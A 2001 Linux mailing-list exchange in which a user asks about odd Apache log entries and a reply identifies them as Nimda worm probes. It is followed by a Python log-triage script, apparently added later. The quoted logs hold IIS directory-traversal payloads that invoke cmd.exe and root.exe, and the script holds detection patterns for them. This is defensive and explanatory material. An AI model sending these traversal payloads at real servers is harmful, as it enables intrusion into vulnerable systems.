Re: under attack ?
- To: Ishai Parasol <ishai-iglu(at-nospam)parasol.org.il>
- Subject: Re: under attack ?
- From: Dani Arbel <darbel(at-nospam)techunix.technion.ac.il>
- Date: Wed, 19 Sep 2001 21:25:05 +0300 (IDT)
- Cc: Linux - IL Mailing List <linux-il(at-nospam)linux.org.il>
- Delivered-To: linux.org.il-linux-il@linux.org.il
- In-Reply-To: <000d01c1413c$cfd26580$0201a8c0@parasol>
- Sender: linux-il-bounce(at-nospam)cs.huji.ac.il
There is a new worm out there flooding the net. Watch for
slowwwwwwwliness.
See Symantec/McAfee etc. Search for "nimda".
Dani
On Wed, 19 Sep 2001, Ishai Parasol wrote:
> Hi
>
> My Apache logs give me tons of this crap:
>
> 212.29.230.44 - - [19/Sep/2001:20:38:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:26 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:31 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:34 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:38 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:44 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:05 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:08 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:11 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:17 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
>
> Does it mean someone thinks I'm running NT and is trying to hack into my server?
> I also get a lot of "GET default.ide...." and about this I'm almost sure that
> it's related to NT servers, but I'm not sure about the rest. Questions:
> 1) Am I right ?
> 2) What can I do about it ?
>
> Thanks,
> Ishai.
>
>
> =================================================================
> To unsubscribe, send mail to linux-il-request@linux.org.il with
> the word "unsubscribe" in the message body, e.g., run the command
> echo unsubscribe | mail linux-il-request@linux.org.il
>
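
One way to triage access-log entries like the ones quoted in this thread, as an added example that is not part of the original messages: it matches the request patterns visible in the quoted log lines, groups the hits by client, and counts any probe that was not answered with a 4xx status. The signature names, function names and sample lines (documentation-range addresses) are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Patterns taken from the request paths quoted in the thread (names are ours).
SIGNATURES = [
    ("root.exe", re.compile(r"/root\.exe\?", re.I)),
    ("cmd.exe", re.compile(r"/winnt/system32/cmd\.exe\?", re.I)),
    ("double-encoded-traversal", re.compile(r"\.\.%255c", re.I)),
    ("unicode-encoded-traversal", re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I)),
]

def classify(path):
    """Return the name of every signature matching the raw request path."""
    return [name for name, rx in SIGNATURES if rx.search(path)]

def summarize(lines):
    """Group probe requests by client; count those not rejected with 4xx."""
    report = defaultdict(lambda: {"probes": 0, "labels": set(), "not_rejected": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we can parse
        host, _ts, _method, path, status = m.groups()
        labels = classify(path)
        if not labels:
            continue  # ordinary request
        entry = report[host]
        entry["probes"] += 1
        entry["labels"].update(labels)
        if not status.startswith("4"):
            entry["not_rejected"] += 1  # the server did not refuse this probe
    return dict(report)

# Constructed sample input: paths as in the thread, addresses from RFC 5737.
SAMPLE = [
    '192.0.2.10 - - [19/Sep/2001:20:38:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"',
    '192.0.2.10 - - [19/Sep/2001:20:38:38 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"',
    '192.0.2.10 - - [19/Sep/2001:20:39:11 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"',
    '198.51.100.7 - - [19/Sep/2001:20:40:02 +0300] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        print(host, info["probes"], sorted(info["labels"]), info["not_rejected"])
```

A non-zero `not_rejected` count is the case that deserves a closer look; every request in the quoted log was answered with 404.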